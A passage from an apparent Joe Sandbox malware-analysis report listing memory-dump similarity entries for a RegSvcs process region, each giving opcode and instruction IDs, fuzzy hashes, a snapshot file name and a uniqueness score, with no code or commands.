                                                                                                    • Instruction Fuzzy Hash: 12115E31E002188FCB64EFB9D9107DEB7F5EB88350F008479951DEB284EB749A84CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ba0517ed8fb02e48d78a22419df0bfc517ca8155a429b28023b2e05ff37d6292
                                                                                                    • Instruction ID: eb42d866ca4357971bdd2f69d320671d6b36854c387ad2bef4d8a87559749c68
                                                                                                    • Opcode Fuzzy Hash: ba0517ed8fb02e48d78a22419df0bfc517ca8155a429b28023b2e05ff37d6292
                                                                                                    • Instruction Fuzzy Hash: F3F0F631B002145B8B24AEFAA88019FB7BAEB8A228B60443DD419DB240DB319D0687E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e7095194c24a01f04141bae1f5a41e7e74e22744af7d7a323121bac09d967908
                                                                                                    • Instruction ID: 7a0e46f1da5c08937c61b7f451a4666cd870c1a5d4462155b9d99e4624e55917
                                                                                                    • Opcode Fuzzy Hash: e7095194c24a01f04141bae1f5a41e7e74e22744af7d7a323121bac09d967908
                                                                                                    • Instruction Fuzzy Hash: ACF08275F002249F8B90FBB8A8082AF7AE9AFC8660B110435D919D7344EF348E0287E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 84af16fc9cf3af18c482d8c4170da76bd02a7771b534ef4ce5b1361dfe28d0c0
                                                                                                    • Instruction ID: 6bbc69593f4ee1aecc110e60a36837d844e1f0f5659944541d69e75e0d250d0a
                                                                                                    • Opcode Fuzzy Hash: 84af16fc9cf3af18c482d8c4170da76bd02a7771b534ef4ce5b1361dfe28d0c0
                                                                                                    • Instruction Fuzzy Hash: 90E06576F012259F87A0DF68A8056EF7BF9EB88611F04056AE50AE3240DB744B158BE0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c93f430d366e744f09899be1f39a1672c5e335a1876c0ecfc608118f485531aa
                                                                                                    • Instruction ID: e1c7d2ea1cbc5636961b1261439a92b6a43fb6e31a62de3ac024f6ba80d4a2f9
                                                                                                    • Opcode Fuzzy Hash: c93f430d366e744f09899be1f39a1672c5e335a1876c0ecfc608118f485531aa
                                                                                                    • Instruction Fuzzy Hash: 70E04875E003159F8B90EFBDA8045AF7BF9EE8C621B114476E60DD3300EB704A018BE1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cd6880243add6413d8810b246deca114035bc4665c82f494306fd9cb6978ebfa
                                                                                                    • Instruction ID: e06384f99fdeeb80d9b0664c93ecd10a9df1fdd8f8968e548c93c830eeb69d57
                                                                                                    • Opcode Fuzzy Hash: cd6880243add6413d8810b246deca114035bc4665c82f494306fd9cb6978ebfa
                                                                                                    • Instruction Fuzzy Hash: 93C08C36B020148BDB149744F8054ECF370E788221F1041A2C2198200483301D144FD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%